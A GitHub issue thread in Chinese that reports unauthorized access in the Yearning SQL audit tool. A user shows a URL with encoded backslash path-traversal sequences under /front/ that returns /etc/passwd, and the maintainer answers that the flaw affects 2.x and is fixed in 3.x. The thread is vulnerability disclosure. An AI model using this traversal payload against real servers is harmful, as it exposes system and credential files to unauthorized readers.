### ISSUE TITLE
[Question] 未授权访问

### ISSUE THREAD

**Issue by Nullrable** [cookieY/Yearning#997]
输入 http://xxxx.coom/front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
可以获取
![image](https://github.com/cookieY/Yearning/assets/59920503/dcb27178-012c-4e71-8fb6-a91565b1146e)

**Comment by cookieY** [comment]
该问题目前存在于 2.x 版本 请升级到3.x版本
